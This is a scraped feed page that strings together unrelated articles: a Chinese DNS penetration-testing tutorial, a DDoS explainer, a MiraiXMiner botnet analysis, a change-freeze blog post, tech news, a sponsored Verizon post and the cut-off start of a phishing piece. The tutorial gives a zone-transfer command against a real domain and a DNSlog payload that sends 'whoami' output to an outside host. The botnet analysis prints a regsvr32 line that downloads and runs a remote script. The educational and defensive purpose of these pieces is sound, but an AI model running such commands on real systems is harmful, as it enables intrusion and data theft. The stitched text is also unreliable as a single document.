新科技创业系列主要针对新科技方向的公司,如AI、机器人、物联网、3D打印、区块链、智能制造、传感器、半导体、VR/AR/MR 、商业航天、新能源、新材料、有技术创新的硬件等。如果你对这个系列感兴趣,欢迎参与我们“新科技创业2018”系列的调研,调研问卷下载地址: https://shimo.im/docs/emmBf3aNrgU4cqn7/ ,问卷回复请发送至syq@36kr.com

理解DNS记录以及在渗透测试中的简单应用

$
0
0
前言

DNS (Domain Name System, 域名系统 ),万维网上作为域名和 IP地址 相互映射的一个 分布式数据库 ,能够使用户更方便的访问 互联网 ,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。

基本概念 根域

就是所谓的“.”,其实我们的网址 www.baidu.com 在配置当中应该是 www.baidu.com. (最后有一点),一般我们在浏览器里输入时会省略后面的点,而这也已经成为了习惯。

根域服务器我们知道有13台,但是这是错误的观点。

根域服务器只是具有13个IP地址,但机器数量却不是13台,因为这些IP地址借助了任播的技术,所以我们可以在全球设立这些IP的镜像站点,你访问到的这个IP并不是唯一的那台主机。具体的镜像分布可以参考维基百科。这些主机的内容都是一样的。

域的划分

根域下来就是顶级域或者叫一级域。

有两种划分方式,一种是互联网刚兴起时的按照行业性质划分的com.,net.等,一种是按国家划分的如cn.,jp.,等。每个域都会有域名服务器,也叫权威域名服务器。

Baidu.com就是一个顶级域名,而 www.baidu.com 却不是顶级域名,他是在baidu.com 这个域里的一叫做www的主机。

一级域之后还有二级域,三级域,只要我买了一个顶级域,并且我搭建了自己BIND服务器(或者其他软件搭建的)注册到互联网中,那么我就可以随意在前面多加几个域了(当然长度是有限制的)。

比如a. www.baidu.com ,在这个网址中, www.baidu.com 变成了一个二级域而不是一台主机,主机名是a。

域名服务器

能提供域名解析的服务器,上面的记录类型可以是A(address)记录,NS记录(name server),MX(mail),CNAME等。

接下来讲解具体的记录类型:

A记录(Address)

A 记录也称为主机记录,是使用最广泛的DNS记录,A记录的基本作用就是说明一个域名对应的IP是多少, 它是域名和IP地址的对应关系,表现形式为 www.baidu.com 119.75.217.109 , 这就是一个A记录!A记录除了进行域名IP对应以外,还有一个高级用法,可以作为低成本的负载均衡的解决方案,比如说, www.baidu.com 可以创建多个A记录,对应多台物理服务器的IP地址,可以实现基本的流量均衡!)。

比如说笔者这里设置的A记录:


理解DNS记录以及在渗透测试中的简单应用

NS 记录(Name Server)

NS 记录和SOA记录是任何一个DNS区域都不可或缺的两条记录,NS记录也叫名称服务器记录,用于说明这个区域有哪些DNS服务器负责解析,SOA记录说明负责解析的DNS服务器中哪一个是主服务器。因此,任何一个DNS区域都不可能缺少这两条记录。NS记录,说明了在这个区域里,有多少个服务器来承担解析的任务。

SOA 记录(Start ofAuthority)

NS 记录说明了有多台服务器在进行解析,但哪一个才是主服务器呢,NS并没有说明,这个就要看SOA记录了,SOA名叫起始授权机构记录,SOA记录说明了在众多NS记录里那一台才是主要的服务器。

MX 记录( Mail Exchanger )

全称是邮件交换记录,在使用邮件服务器的时候,MX记录是无可或缺的,比如A用户向B用户发送一封邮件,那么他需要向DNS查询B的MX记录,DNS在定位到了B的MX记录后反馈给A用户,然后A用户把邮件投递到B用户的MX记录服务器里。

CNAME 记录

别名记录。这种记录允许您将多个名字映射到另外一个域名。通常用于同时提供WWW和MAIL服务的计算机。例如,有一台计算机名为“host.mydomain.com”(A记录)。它同时提供WWW和MAIL服务,为了便于用户访问服务。可以为该计算机设置两个别名(CNAME):WWW和MAIL。这两个别名的全称就 http://www.mydomain.com/ 和“mail.mydomain.com ”。实际上他们都指向 “ host.mydomain.com ”。

SRV 记录

SRV 记录的作用是指明某域名下提供的服务。

例如:

_http._tcp.example.com. SRV 10 5 80. www.example.com

SRV 后面项目的含义:

10 优先级,类似 MX 记录 5 权重 80 端口

www.example.com 实际提供服务的主机名。

PTR 记录

PTR 记录也被称为指针记录, PTR 记录是 A 记录的逆向记录,作用是把 IP 地址解析为域名。由于我们在前面提到过, DNS 的反向区域负责从 IP 到域名的解析,因此如果要创建 PTR 记录,必须在反向区域中创建。

ip 反查域名: https://dns.aizhan.com/103.43.134.210/

解析过程

1. 现在我有一台计算机,通过ISP接入了互联网,那么ISP就会给我分配一个DNS服务器,这个DNS服务器不是权威服务器,而是相当于一个代理的dns解析服务器,他会帮你迭代权威服务器返回的应答,然后把最终查到IP返回给你。

2. 现在的我计算机要向这台ISPDNS发起请求查询 www.baidu.com 这个域名了,(经网友提醒:这里其实准确来说不是ISPDNS,而应该是用户自己电脑网络设置里的DNS,并不一定是ISPDNS。比如也有可能你手工设置了8.8.8.8)

3. ISPDNS拿到请求后,先检查一下自己的缓存中有没有这个地址,有的话就直接返回。这个时候拿到的ip地址,会被标记为非权威服务器的应答。

4. 如果缓存中没有的话,ISPDNS会从配置文件里面读取13个根域名服务器的地址(这些地址是不变的,直接在BIND的配置文件中)。

5. 然后像其中一台发起请求。

6. 根服务器拿到这个请求后,知道他是com.这个顶级域名下的,所以就会返回com域中的NS记录,一般来说是13台主机名和IP。

7. 然后ISPDNS向其中一台再次发起请求,com域的服务器发现你这请求是baidu.com这个域的,我一查发现了这个域的NS,那我就返回给你,你再去查。(目前百度有5台baidu.com的顶级域名服务器)。

8. ISPDNS不厌其烦的再次向baidu.com这个域的权威服务器发起请求,baidu.com收到之后,查了下有www的这台主机,就把这个IP返回给你了。

9. 然后ISPDNS拿到了之后,将其返回给了客户端,并且把这个保存在高速缓存中。

工具使用 nslookup

笔者目前使用的kali虚拟机,下载连接: https://www.kali.org/downloads/


理解DNS记录以及在渗透测试中的简单应用
理解DNS记录以及在渗透测试中的简单应用

第一行Server是: DNS服务器的主机名 218.2.135.1

第二行Address是: 服务器的ip地址 218.2.135.1#53

非全未应答(Non-authoritative answer):

Name是:解析的URL www.lengbsikai.net

Address是:103.43.134.210

第二幅图百度的解析比较复杂一点:

多出一个CNAME记录: www.a.shifen.com

Dig

接着上面分析。

通过dig迭代追踪查看一下:


理解DNS记录以及在渗透测试中的简单应用
第一步是向我这台机器的ISPDNS(218.2.135.1)获取到根域服务区的13个IP和主机名[a-m].root-servers.net.。
理解DNS记录以及在渗透测试中的简单应用

第二步是向其中的一台根域服务器(Servername就是末行小括号里的ip:198.97.190.53#53(h.root-servers.net))发送 www.baidu.com 的查询请求,他返回了com.顶级域的服务器IP(未显示)和名称。


理解DNS记录以及在渗透测试中的简单应用

第三步,便向com.域的一台服务器192.54.112.30#53请求 www.baidu.com ,他返回了baidu.com域的服务器IP(未显示)和名称,百度有五台顶级域的服务器

【此处可以用dig @192.54.112.30 www.baidu.com 查看返回的百度顶级域名服务器IP地址】。


理解DNS记录以及在渗透测试中的简单应用
理解DNS记录以及在渗透测试中的简单应用

(ps:这个时候是能看到拜读顶级服务器对应的ip地址的。)

第四步,向百度的顶级服务器(220.181.37.10)请求 www.baidu.com ,他发现这个www有个别名,而不是一台主机,别名是 www.a.shifen.com 。


理解DNS记录以及在渗透测试中的简单应用

看到上面的情况,问题就来了,按照一般的逻辑,当dns请求到别名的时候,查询会终止,而是重新发起查询别名的请求,所以此处应该返回的只是 www.a.shifen.com 。但是为什么返回a.shifen.com的这个域的NS呢?

同样用dig来追踪一下看看:


理解DNS记录以及在渗透测试中的简单应用
理解DNS记录以及在渗透测试中的简单应用

第三步的时候发现shifen.com这个顶级域名的域名服务器和baidu.com这个域的域名服务器是同一台主机。(dns.baidu.com)

漏洞利用 DNS域传送(DNS Zone Transfer )

DNS 服务器分为: 主服务器、备份服务器和缓存服务器。域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 在主备服务器之间同步数据库,需要使用 “DNS 域传送 ” 。

由于DNS协议 运行在 UDP 协议 之上,使用端口号53,所以可以使用一些特殊的搜索引擎来快速获取目标。

利用网络空间搜索引擎收集域名服务器:

Shodan(https://www.shodan.io)


理解DNS记录以及在渗透测试中的简单应用

Zoomeye(https://www.zoomeye.org)


理解DNS记录以及在渗透测试中的简单应用

fofa ( https://fofa.so )


理解DNS记录以及在渗透测试中的简单应用

利用masscan搜集DNS服务器:


理解DNS记录以及在渗透测试中的简单应用

对ns.xml结果去重:


理解DNS记录以及在渗透测试中的简单应用
验证及修复

本文的验证漏洞都是通过zZone-Transfe( https://github.com/Xyntax/zZone-Transfer )脚本给出的。

nslookup
理解DNS记录以及在渗透测试中的简单应用
Namp
理解DNS记录以及在渗透测试中的简单应用
dig dig @ns.lining.cn axfr li-ning.com

@ 指定域名服务器; axfr 为域传送指令; xxx.edu.cn 表示要查询的域名;


理解DNS记录以及在渗透测试中的简单应用

修复:

区域传送是DNS常用的功能,区域传送的漏洞也不是没有办法解决的,严格限制允许区域传送的主机即可,例如一个主 DNS 服务器应该只允许它的从 DNS 服务器执行区域传送的功能。

DNSlog注入

在测试一些网站的时候,一些注入类的漏洞都是没有任何回显信息的,这个时候我们很难判断自己的payload是否执行成功,这个时候可以借助dnslog。

简单的理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过这种方式把想获得的数据外带出来。

Dnslog基本原理
理解DNS记录以及在渗透测试中的简单应用

通过上面的学习,可以很清楚的明白对一个网站发起访问请求的时候,DNS的解析过程。

其中红色部分的服务器是可控的,只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显信息,放到自己域名的二级或者是三级域名上去请求,就可以通过DNS解析日志来获取它们。

Dnslog工具及利用

如果有自己的域名和服务器,可以自己搭建一个平台,开源项目源码:

https://github.com/BugScanTeam/DNSLog

另外就是已经搭建好的免费在线平台:

http://ceye.io

注册好后会给每个人一个身份标识,这是构造回显的关键。

(打码有点重,将就着看看。)


理解DNS记录以及在渗透测试中的简单应用

平台里面也提供了一些利用的payload:


理解DNS记录以及在渗透测试中的简单应用

先用自己的vps简单的演示一下:

比如:curl http://ip.port.b182oj.ceye.io/`whoami`

这个时候需要根据实际情况对payload进行替换,ip 、port、 Identifier 。


理解DNS记录以及在渗透测试中的简单应用

漫话:如何给女朋友解释什么是DDoS攻击?

$
0
0

漫话:如何给女朋友解释什么是DDoS攻击?

周五下班比较早,我正在家里面玩吃鸡游戏,正在疯狂的跑毒,这时候坐在旁边刷着抖音的女朋友问了我一个奇怪的问题。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?

分布式拒绝服务(DDoS:Distributed Denial of Service)攻击,是指攻击者利用大量“肉鸡”对攻击目标发动大量的正常或非正常请求、耗尽目标主机资源或网络资源,从而使被攻击的主机不能为正常用户提供服务。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
DoS

在介绍DDoS之前,需要先简单介绍一下什么是DoS。

DoS(拒绝服务,Denial of Service)就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。这是早期非常基本的网络攻击方式。

举一个简单的例子,小王开了一家商店,店面不大,加上小王一共有三个服务员。由于他们这里物美价廉,工作人员的态度又比较友善,所以慢慢的生意越来越好。

但是,这家店所在的小镇上有一个恶霸,恶霸看到小王的店很赚钱,想要通过一些下作的手段谋取私利。于是他装扮成普通的顾客,在小王的店里有一搭无一搭的总和店员攀谈,问问这个多少钱,问问那个怎么卖,还时不时的给店员提供一些虚假信息,比如哪里缺货了之类的信息。使店员们都被他搞的团团转。

由于恶霸是装作普通顾客的,小王和店员们又不能彻底不理他,所以就要分出一些精力来服务他,但是由于店内的服务员有限。这样一来,很多其他的顾客就可能受到了冷落。

对于网站来说,其实也是一样的,网站就像是小王的商店一样。对于一个网站来说,他是要搭建在服务器上面的,而由于硬件资源有限,所以服务能力也是有限的。如果有人频繁访问或者长时间占用资源,就会导致其他用户的体验有所下降。

这种,利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应的行为,就是DoS攻击。

在信息安全的三要素―― 保密性完整性可用性 中,DoS针对的目标正是 可用性 。该攻击方式利用目标系统网络服务功能缺陷或者直接消耗其系统资源,使得该目标系统无法提供正常的服务。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
DDoS

如果只是一个恶霸的话,只要能够识别出来,然后阻止他进入店铺就行了。

随着恶霸被发现之后,他也想了一个办法,这次他不再自己一个人跑去店里捣乱了,而是纠集了一群无赖,而这些无赖每天都换,店铺里面的服务员根本识别不出来到底谁是恶霸派来的。

无赖们扮作普通客户一直拥挤在商场,赖着不走,真正的购物者却无法进入;或者总是和营业员有一搭没一搭的东扯西扯,让工作人员不能正常服务客户;也可以为商铺的经营者提供虚假信息,商铺的上上下下忙成一团之后却发现都是一场空,最终跑了真正的大客户,损失惨重。一个无赖去胡闹,就是 DoS攻击,而一群无赖去胡闹,就是 DDoS攻击。


漫话:如何给女朋友解释什么是DDoS攻击?

一般来说,DDoS 攻击可以具体分成两种形式:带宽消耗型以及资源消耗型。它们都是透过大量合法或伪造的请求占用大量网络以及器材资源,以达到瘫痪网络以及系统的目的。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
DDoS的危害

当服务器被DDos攻击时,一般会出现以下现象:

被攻击主机上有大量等待的TCP连接;

网络中充斥着大量的无用的数据包;

受害主机无法正常和外界通讯;

受害主机无法处理所有正常请求;严重时会造成系统死机。

对于用户来说,在常见的现象就是网站无法访问。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
DDoS的防范

为了对抗 DDoS攻击,你需要对攻击时发生了什么有一个清楚的理解。简单来讲,DDoS 攻击可以通过利用服务器上的漏洞,或者消耗服务器上的资源(例如 内存、硬盘等等)来达到目的。

一般来说,可以用以下办法防范:

1、如果可以识别出攻击源,如机器IP等,可以在防火墙服务器上放置一份 ACL(访问控制列表) 来阻断这些来自这些 IP 的访问。

2、对于带宽消耗型攻击,最有效的办法那就是增加贷款。

3、提高服务器的服务能力,增加负载均衡,多地部署等。

4、优化资源使用提高 web server 的负载能力。例如,使用 apache 可以安装 apachebooster 插件,该插件与 varnish 和 nginx 集成,可以应对突增的流量和内存占用。

5、使用高可扩展性的 DNS 设备来保护针对 DNS 的 DDOS 攻击。可以考虑购买 Cloudfair 的商业解决方案,它可以提供针对 DNS 或 TCP/IP3 到7层的 DDOS 攻击保护。

6、启用路由器或防火墙的反IP欺骗功能。

7、付费,使用第三方的服务来保护你的网站。

8、监控网络和 web 的流量。时刻观察流量变化

9、保护好 DNS 避免 DNS 放大攻击。


漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?
漫话:如何给女朋友解释什么是DDoS攻击?

对于网络攻击,没有任何办法彻底阻止和避免 ,只能尽最大努力不断提高黑客攻击成本。

参考资料:https://www.oschina.net/translate/15-ways-to-stop-ddos-attacks-in-network


漫话:如何给女朋友解释什么是DDoS攻击?

融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

$
0
0

近日,深信服安全团队跟踪到一新型的物联网僵尸网络,其融合了多种已知病毒家族的特点,包括Mirai物联网僵尸网络病毒、MyKings僵尸网络病毒、远控木马、挖矿等,传播方式包括永恒之蓝漏洞、闭路电视物联网设备漏洞、mssql漏洞、RDP爆破和Telnet爆破等。

深信服已将其命名为MiraiXMiner,并且制定了完善的防御措施。

0x01攻击流程

1.病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击。

2.根据C&C命令从云端下载任意的攻击模块,此次的攻击模块为csrs.exe。

3.添加恶意特权账户admin$。

4.从黑客服务器下载三个子模块:后门模块、DNS劫持模块、净化&下载挖矿模块。

5.后门模块up.rar经过分析发现为有名的BootKit远控木马。

6.u.exe通过篡改DNS配置文件达到劫持DNS的目的。

7.净化模块upsnew2.exe的功能很多,除了杀死同行病毒,添加自启动项以外,还会停止windows自动更新服务,以更稳定地控制受害主机。最重要的,该模块后续还会不定期下载并执行挖矿程序。

8.使用扫描工具和Mirari攻击库对内网设备进行大范围攻击。

9.最后,母体msinfo.exe会连接云端,自动更新病毒,实时下载最新的攻击模块。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络
0x02传播模块
融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

扫描445端口,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

通过内置的masscan程序进行扫描,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

通过内置的nmap程序进行扫描行为,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

对扫描到的目标,相应的攻击行为,如下所示:

执行永恒之蓝攻击行为CrackerMS17010,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

攻击CCTV物联网设备漏洞CrackerCCTV,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

攻击MSSQL漏洞CrackerMSSQL,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

然后执行下面的数据库Payload命令过程,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

将如下恶意代码写入数据库存储过程中,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

恶意代码如下所示:

对RDP进行攻击CrackerRDP,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

对Telnet进行攻击CrackerTelnet,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络
0x03 创建admin$账号

从服务器上下载相应的配置文件,然后解密,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

然后解密出相应的XML文件,进行下载执行恶意程序操作,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

下载回来的CSRS是一个python脚本编写后生成的EXE,主要是一个Exploit,用于通过MS17010漏洞,添加帐号,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

添加之后的主机,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

执行MS17010漏洞攻击,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

攻击的参数,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络
0x04 挖矿与远控木马

下载恶意程序,能过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

解密出上面的XML脚本,如下所示:


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

Upsnew2释放远控木马item.dat以及c3.bat脚本。

c3.bat脚本功能如下:

清除其他病毒。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

开启MSSQLSERVER。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

在注册表以及任务计划中添加自启动。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络
融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

关闭自动更新。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

加载远控木马。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

配置防火墙策略,关闭135、137、138、139、445端口,防止再被其他病毒感染。


融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络
0x05 解决方案

1、隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡。

2、切断传播途径:关闭潜在终端的SMB 445等网络共享端口,关闭异常的外联访问。

3、查找攻击源:借助深信服安全感知平台检测内网攻击源。

4、查杀病毒:推荐使用深信服终端安全检测响应平台EDR进行查杀,病毒库需升级到20181204版本。

5、修补漏洞:打上永恒之蓝MS17-010等漏洞相关补丁。

It’s The Change Freeze Season

$
0
0

It’s The Change Freeze Season

Everyone’s favorite time of the year is almost here! Is it because it’s the holiday season? Perhaps it’s the magic that happens at the end of the year? Or maybe, it’s because there’s an even better reason to get excited!

Change Freeze Season!

That’s right. Some of you reading this started jumping up and down like Buddy the Elf at the thought of having a change freeze. There’s something truly magical about laying down the law about not touching anything in the system until after the end-of-year reports are run and certified. For some, this means a total freeze of non-critical changes from the first of December all the way through the New Year until maybe even February. That’s a long time to have a frozen network? But why?

The Cold Shoulder

Change freezes are an easy thing to explain to the new admins. You simply don’t touch anything in the network during the freeze unless it’s broken. No tweaking. No experimenting. No improvements. Just critical break/fix changes only. There had better be a ticket. There should be someone yelling that something’s not right. Otherwise you’re in for it.

There are a ton of reasons for this. The first is something I remember from my VAR days as Boredom Repellent. When you find yourself at the end of year with nothing to do, you tend to get bored. After you’ve watched Die Hard for the fifteenth time this year you decide it’s time to clear out your project backlog. Or maybe you’ve been doing some learning modules instead. You find a great blog post from one of your favorite writers about a Great Awesome Amazing Feature That Will Save You Days Of Work If You Just Enable This One Simple Command!

In either case, the Boredom Repellent becomes like pheromones for problems. Those backlogged projects take more time than you expected. That simple feature you just need to enable isn’t so simple. It might even involve an entire code upgrade train to enable it. Pretty soon you find yourself buried in a CLI mess with people screaming about very real downtime. Now, instead of being bored you’re working until the wee hours of the night because of something you did.

The second reason for change freezes at the end of the year is management. You know, the people that call and scream at you as soon as their email appears to be running slow. The people that run reports once a month at 6:00pm and then call you because they get a funny warning message on their screen. Those folks. Guess what? End-of-year is their time to shine in all their glory.

This is usually the time they are under the most stress. Those reports have to be reprinted. All the financials from the year need to be consolidated and verified. The taxes will need to be paid. And all that paperwork and pressure adds up to stress. The kind of stress that makes any imperfections in the network seem ten times more important than before. Report screen not show success within 10 ms? Problem. Printer run out of yellow toner? Network problem. Laptop go to sleep while someone went to lunch and now the entire report is gone? Must be your problem. And guess who gets to work around the clock to solve it with someone bearing down on them from on high?

Don’t Let It Go

The fact is that we can’t have people doing things in the network without tracking those changes back to reasons. That applies for adventurous architects wanting to squeeze out the last ounce of performance from that amazing new switch. And it goes double for the CFO demanding you put his traffic into AF41 so it gets to the server faster so his reports don’t take six hours to print.

It all comes back to the simple fact that we have no way to track changes in our network and we have no way of knowing what will happen when we make one live. It feels an awful lot like this GIF:


It’s The Change Freeze Season

Crazy, right? Yet every time we hit the Enter key, we are amazed at the results. Even for “modern” OSes with sanity checking, like Junos or IOS-XR, you have no way of knowing if a change you make on one device somewhere in the branch is going to crash OSPF or BGP for the entire organization. And even if there was a big loud warning popup that said, “ALERT: YOU ARE GOING TO BREAK EVERYTHING!!!”, odds are good we would just click past it.

Network automation and orchestration systems can prevent this. They can take the control of change management out of the hands of bored engineers and wrap it in process and policy. And if the policy says Change Freeze then that’s what you get. No changes. Likewise, if there is a critical need, like patching out a backdoor or something, that policy can be overridden and noted so that if there is a bug eight months from now in that code train that causes issues you can have documentation of the reason for the change when someone comes to chew you out.

Likewise, there are other solutions out there that try to prototype the entire network to figure out what will happen when you make a change. Companies like Forward Networks and Veriflow can prototype your network in a model that can assess the impact of a change before you commit to it. It’s the dream of a bored engineer because you can run simulations to your heart’s content to find out if two hours of code upgrades will really get you that 2% performance increase promised in that blog post. And for the CFO/CEO/CIO screaming at you to prioritize their traffic, these solutions can remind them that most of their traffic is Youtube and Spotify and having that at AF41 will cause massive issues for them.

What’s important is that you and the rest of the team realize that change freezes aren’t a solution to the problem of an unstable network. Instead, they are treating the symptoms that crop up from the underlying disease of the network not being a deterministic system. Unlike some other machines, networks run just fine at sub-optimal performance levels. You can make massive mistakes that will live in a network for years and never show their ugly face. That is, until you make a small change that upsets equilibrium and causes the whole system to fail, cascade style, and leave you holding the keyboard as it were.

Tom’s Take

I both love and hate Change Freeze season. I know it’s for the best because any changes that get made during this time will ultimately result in long hours at work undoing those changes. I also know that the temptation to experiment with things is very, very strong this time of year. But I feel like Change Freeze season will soon go the way of the aluminum Christmas tree when we get change management and deterministic network modeling systems in place to verify changes on a system-wide basis and not just sanity checking configs at a device level. Tracking, prototyping, and verification will solve our change freeze problems eventually. And that will make it the most wonderful time of the year all year long.

Advertisements

<script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-26942-5c0a84b603215', { collapseEmpty: 'before', sectionId: '26942', width: 300, height: 250 }); }); </script>

<script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-114160-5c0a84b603218', { collapseEmpty: 'before', sectionId: '114160', width: 300, height: 250 }); }); </script>

22 apps on the Google Play Store had a massive security problem and millions of ...

$
0
0

22 apps on the Google Play Store had a massive security problem and millions of  ...

Google typically removes malicious apps from thePlay Store, and that’s not anything new or notable. It’s their digital storefront so they should stay on top of keeping it clean from potentially dangerous apps. However, after their last round of nixing 22 apps from thePlay Store, it turns out that maybe Google let some seriously malicious apps fly under the radar for a very long time.

Those 22 apps totaled around 2 million downloads on user devices, and they all had a malicious backdoor that was abused in an ad-clicking scheme. It started with the Sparkle Flashlight app, which was updated to include a secret app downloader back in June of this year after being on the Play Store since 2016, and then spready to a few other existing and new applications.

These apps would phone home to download the ad-fraud modules and would receive new commands every 80 seconds, which typically involved displaying and clicking on ads to generate revenue. To keep that hidden, the ads were displayed in a virtually nonexistent window that was zero pixels high and zero pixels wide. But even though users couldn’t see the ads, those apps would quickly drain battery and use tons of data in the background, even to the point where they would reopen after being force closed so they could continue to run in the background.


22 apps on the Google Play Store had a massive security problem and millions of  ...

To obfuscate things even further, this ad-fraud had devices spoofing their user agent strings to avoid false click detection. They would report to ad servers as several different models of iPhones as well as any of any of 249 models of Android devices.

It’s good news that Google has finally pulled these apps off the store, obviously, but the fact that they were available for so long through official channels and doing something so intrusive in the background really raises some eyebrows about how Google handles its storefront. It’d be one thing if these apps had to be sideloaded from a website, but being able to get malware to rival some awful windows viruses directly through Google Play doesn’t build much confidence in anyone.

And for anyone reading this, seriously, don’t install flashlight apps.

source: Ars Technica

5 things every business should focus on to be successful

$
0
0

There are so many factors that go into making a business successful, from hiring the right talent and developing a product roadmap to managing real estate, technology, and finances.

And if just one of those things falls through the cracks, everything that leadership has been working to build can come crashing down.

With so many moving parts, business leaders must remain laser-focused on the core qualities of a successful company.

By pursuing a set of clearly defined guiding values, business leaders can ensure that their organizations remain on the right path, even as employees, technology tools, and office space come and go.

Here are some things that should be on your list of priorities.

1. Security

Whether you're a consumer-facing or business-to-business company, keeping customer data secure is of the utmost importance. Between lost business, reduced productivity, and security investments, one study estimates that cybercrime costs businesses an average of $11.7 million a year.

Technology companies like Verizon have teams of security experts to protect against cyberattacks across its 4G LTE network, processing more than 1 million security threats daily. On top of strong user-authentication technology, Verizon ensures its customers' safety by installing firewalls, implementing procedures that guard against unauthorized access, and monitoring its networks around the clock.

2. Teamwork and partnership

Every great company is better than the sum of its parts. In a study of more than a thousand companies, Babson College and the Institute for Corporate Productivity found that high-performing firms are 5.5 times more likely to incentivize collaborative behavior . This is likely because collaborating enables you to tap into a larger pool of talent and lets each person focus on what they do best. But it's important for teams to have the right tools to collaborate.

When companies use Dell enterprise products with Verizon 4G LTE wireless built in, they can work hand in hand with Dell's team of Small Business Technology Advisers. These experts collaborate with businesses to assess their tech needs, provide solutions, and deliver future-proof technology that grows with the company ― and they're easily accessible by online chat or phone .

3. Speed

Business moves faster today than it ever has before. This means it's never been more important for executives to put their employees in a position where they can complete their tasks as quickly as possible.

Because of this, many companies choose Verizon, the largest, most reliable 4G LTE wireless network . With Verizon, employees can download emails in less than a second, an e-book in four seconds, and a five-minute video in 27 seconds.

4. Productivity

Productivity is the name of the game for businesses of all sizes. If employees aren't completing projects and driving tangible results, you're not going to be in business for very long.

Companies can boost productivity by equipping their teams with Lenovo's ThinkPad X1 2-in-1 Yoga laptop and tablet. The device's powerful eighth-generation Intel Quad Core processor delivers 35% better performance than the previous generation. And with dual Intel Thunderbolt 3 ports, the ThinkPad X1 Yoga enables faster data transfer up to 40 GBs over USB-C, four times the data and times the video bandwidth of any other port type.

5. Employee satisfaction

It's always important to make sure your employees are content with their work. Positive workplace environments help companies attract the best talent, and happy workers have been found to be 12% more productive than the average employee. Things like recruitment bonuses, career growth, and paid time off for volunteer work are some of the things that help to keep employees happy.

By focusing on these five values across their various departments, business leaders can build growing, sustainable firms that are ready for continuously evolving future. All it takes is some planning and some follow-through.

Learn more about how Verizon can take your business to the next level.

This post is sponsored by Verizon.

Verizon

Chinese Mobile App Companies Are a National Security Risk, Says a Top Democrat

$
0
0
Chinese mobile app companies pose the same national security risk to the US as telecom giants like Huawei and ZTE, Sen. Mark Warner said in an interview. From a report:

Recent US legislation largely banned Huawei and ZTE from use by the government and its contractors , due to concerns about surveillance and other national security risks. Now Warner, the top Democrat on the Senate Intelligence Committee, is signaling that Chinese app developers may face similar scrutiny from lawmakers, corporate America, and the intelligence community .

Warner's comments follow a recent BuzzFeed News report that popular apps from China's Cheetah Mobile and Kika Tech were exploiting user permissions to engage in a form of ad fraud . Eight Android apps with more than 2 billion total downloads were said to be engaging in a form of app-install ad fraud. Google subsequently removed two of the apps from the Play store and said it continues to investigate. Cheetah and Kika deny engaging in app-install fraud. "Under Chinese law, all Chinese companies are ultimately beholden to the Communist Party, not their board or shareholders, so any Chinese technology company -- whether in telecom or mobile apps -- should be seen as extensions of the state and a national security risk," Warner said in an interview this week with BuzzFeed News .

Further reading: Sen. Warner calls for US cyber doctrine, new standards for security .

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

$
0
0

Spam email is a part of daily life on the internet. Even the best junk mail filters will still allow through certain suspicious looking messages. If an illegitimate email tries to persuade you to click a link and enter personal information, then it is classified as a phishing attack.

